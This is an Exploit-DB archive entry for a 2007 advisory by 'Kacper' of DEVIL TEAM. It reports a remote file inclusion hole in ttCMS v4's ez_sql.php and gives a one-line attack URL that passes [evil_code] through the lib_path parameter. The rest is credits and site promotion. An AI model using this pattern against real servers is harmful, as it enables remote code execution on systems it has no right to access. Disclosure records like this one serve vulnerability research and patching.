ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion

EDB-ID:

3563


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2007-03-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]

# milw0rm.com [2007-03-24]